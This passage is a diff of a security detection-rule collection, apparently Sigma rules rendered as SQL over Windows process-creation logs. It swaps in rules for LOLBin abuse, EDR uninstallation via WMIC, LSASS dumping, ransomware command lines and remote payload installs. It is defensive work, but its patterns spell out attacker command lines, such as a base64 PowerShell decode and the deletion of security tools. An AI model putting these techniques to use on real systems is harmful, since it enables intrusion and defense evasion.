"proc_creation_win_regsvr32_spawn_explorer.yml" }, { - "title": "Service Started/Stopped Via Wmic.EXE", - "id": "0b7163dc-7eee-4960-af17-c0cd517f92da", + "title": "Use of Adplus.exe", + "id": "2f869d59-7f6a-4931-992c-cce556ff2d53", "status": "experimental", - "description": "Detects usage of wmic to start or stop a service", + "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", "author": "Nasreddine Bencherchali 
(Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1047" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of Adplus" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service %' ESCAPE '\\' AND CommandLine LIKE '% call %' ESCAPE '\\' AND (CommandLine LIKE '%stopservice%' ESCAPE '\\' OR CommandLine LIKE '%startservice%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\adplus.exe' ESCAPE '\\' OR OriginalFileName = 'Adplus.exe') AND (CommandLine LIKE '% -hang %' ESCAPE '\\' OR CommandLine LIKE '% -pn %' ESCAPE '\\' OR CommandLine LIKE '% -pmn %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -po %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -sc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_service_manipulation.yml" + "filename": "proc_creation_win_lolbin_adplus.yml" }, { - "title": "DNS RCE CVE-2020-1350", - "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "title": "Suspicious VBoxDrvInst.exe Parameters", + "id": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", "status": "test", - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + 
"attack.t1112" ], "falsepositives": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" + "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\VBoxDrvInst.exe' ESCAPE '\\' AND CommandLine LIKE '%driver%' ESCAPE '\\' AND CommandLine LIKE '%executeinf%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2020_1350.yml" + "filename": "proc_creation_win_virtualbox_vboxdrvinst_execution.yml" }, { - "title": "Renamed Jusched.EXE Execution", - "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", + "title": "Potential Tampering With Security Products Via WMIC", + "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", "status": "test", - "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", - "author": "Markus Neis, Swisscom", + "description": "Detects uninstallation or termination of security products using the WMIC utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1036.003" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (NewProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\'))" + 
"SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR 
CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_jusched.yml" + "filename": "proc_creation_win_wmic_uninstall_security_products.yml" }, { - "title": "File Decoded From Base64/Hex Via Certutil.EXE", - "id": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", - "status": "test", - "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. 
This can be abused by attackers to decode an encoded payload before execution", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "Computer Password Change Via Ksetup.EXE", + "id": "de16d92c-c446-4d53-8938-10aeef41c8b6", + "status": "experimental", + "description": "Detects password change for the computer's domain account or host principal via \"ksetup.exe\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-decode %' ESCAPE '\\' OR CommandLine LIKE '%/decode %' ESCAPE '\\' OR CommandLine LIKE '%-decodehex %' ESCAPE '\\' OR CommandLine LIKE '%/decodehex %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ksetup.exe' ESCAPE '\\' OR OriginalFileName = 'ksetup.exe') AND CommandLine LIKE '% /setcomputerpassword %' ESCAPE '\\')" ], - "filename": "proc_creation_win_certutil_decode.yml" + "filename": "proc_creation_win_ksetup_password_change_computer.yml" }, { - "title": "Rundll32 With Suspicious Parent Process", - "id": "1723e720-616d-4ddc-ab02-f7e3685a4713", + "title": "Renamed Sysinternals Sdelete Execution", + "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. 
Variant of Raspberry Robin, as first reported by Red Canary.", - "author": "CD_ROM_", + "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.impact", + "attack.t1485" ], + "falsepositives": [ + "System administrator usage" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + }, + { + "title": "Suspicious Msiexec Quiet Install From Remote Location", + "id": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", + "status": "experimental", + "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "medium", + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '% -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' 
ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\') AND (CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_parent_explorer.yml" + "filename": "proc_creation_win_msiexec_install_remote.yml" }, { - "title": "Filter Driver Unloaded Via Fltmc.EXE", - "id": "4931188c-178e-4ee7-a348-39e8a7a56821", - "status": "test", - "description": "Detect filter driver unloading activity via fltmc.exe", - "author": "Nasreddine Bencherchali", + "title": "Renamed CreateDump Utility Execution", + "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "status": "experimental", + "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_fltmc_unload_driver.yml" + "filename": "proc_creation_win_renamed_createdump.yml" }, { - 
"title": "Curl.EXE Execution With Custom UserAgent", - "id": "3286d37a-00fd-41c2-a624-a672dcd34e60", - "status": "test", - "description": "Detects execution of curl.exe with custom useragent options", + "title": "Suspicious Cmdl32 Execution", + "id": "f37aba28-a9e6-4045-882c-d5004043b337", + "status": "experimental", + "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1071.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR OriginalFileName = 'CMDL32.EXE') AND (CommandLine LIKE '%/vpn %' ESCAPE '\\' AND CommandLine LIKE '%/lan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_useragent.yml" + "filename": "proc_creation_win_lolbin_cmdl32.yml" }, { - "title": "WhoAmI as Parameter", - "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", - "status": "test", - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. 
used by EfsPotato)", - "author": "Florian Roth (Nextron Systems)", + "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", + "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", + "status": "experimental", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_whoami_as_param.yml" + "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" }, { - "title": "Read Contents From Stdin Via Cmd.EXE", - "id": "241e802a-b65e-484f-88cd-c2dc10f9206d", + "title": "Suspicious File Execution From Internet Hosted WebDav Share", + "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", "status": "experimental", - "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. 
As seen being used in malicious LNK files", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%<%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_stdin_redirect.yml" + "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" }, { - "title": "Potential Credential Dumping Via WER", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", + "title": "Potential Data Stealing Via Chromium Headless Debugging", + "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "status": "experimental", - "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", - "author": "@pbssubhash , Nasreddine Bencherchali", + "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1185" ], "falsepositives": [ - "Windows Error Reporting might produce similar behavior. 
In that case, check the PID associated with the \"-p\" parameter in the CommandLine." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" ], - "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" + "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" }, { - "title": "Suspicious Reg Add BitLocker", - "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "title": "Potential Rundll32 Execution With DLL Stored In ADS", + "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", "status": "experimental", - "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", - "author": "frack113", + "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", + "author": "Harjot Singh, '@cyb3rjy0t'", "tags": [ - "attack.impact", - "attack.t1486" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' 
AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" ], - "filename": "proc_creation_win_reg_bitlocker.yml" + "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" }, { - "title": "Unusual Child Process of dns.exe", - "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", - "status": "experimental", - "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch", + "title": "Execution in Outlook Temp Folder", + "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "status": "test", + "description": "Detects a suspicious program execution in Outlook temp folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.initial_access", - "attack.t1133" + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_dns_susp_child_process.yml" + "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" }, { - "title": "Potential BlackByte Ransomware Activity", - "id": "999e8307-a775-4d5f-addc-4855632335be", - "status": "test", - "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "title": "Suspicious Hacktool Execution - PE Metadata", + "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "status": "experimental", + "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Company = 'Cube0x0')" ], - "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" + "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" }, { - "title": "Potential Suspicious Windows Feature Enabled - ProcCreation", - "id": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", - "status": "experimental", - "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", 
- "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Dropping Of Password Filter DLL", + "id": "b7966f4a-b333-455b-8370-8ca53c229762", + "status": "test", + "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", + "author": "Sreeman", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1556.002" ], "falsepositives": [ - "Legitimate usage of the features listed in the rule." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND CommandLine LIKE '%-Online%' ESCAPE '\\' AND CommandLine LIKE '%-FeatureName%' ESCAPE '\\' AND (CommandLine LIKE '%TelnetServer%' ESCAPE '\\' OR CommandLine LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR CommandLine LIKE '%TFTP%' ESCAPE '\\' OR CommandLine LIKE '%SMB1Protocol%' ESCAPE '\\' OR CommandLine LIKE '%Client-ProjFS%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '%scecli\\\\0%' ESCAPE '\\' AND CommandLine LIKE '%reg add%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" + "filename": "proc_creation_win_reg_credential_access_via_password_filter.yml" }, { - "title": "Suspicious WindowsTerminal Child Processes", - "id": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", - "status": "experimental", - "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Exploiting SetupComplete.cmd CVE-2019-1378", + "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", + 
"status": "test", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ + "attack.privilege_escalation", + "attack.t1068", "attack.execution", - "attack.persistence" + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" ], "falsepositives": [ - "Other legitimate \"Windows Terminal\" profiles" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WindowsTerminal.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% iex %' ESCAPE '\\' OR CommandLine LIKE '% icm%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%Import-Module%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft.VisualStudio.DevShell.dll%' ESCAPE '\\' AND CommandLine LIKE '%Enter-VsDevShell%' ESCAPE '\\') OR 
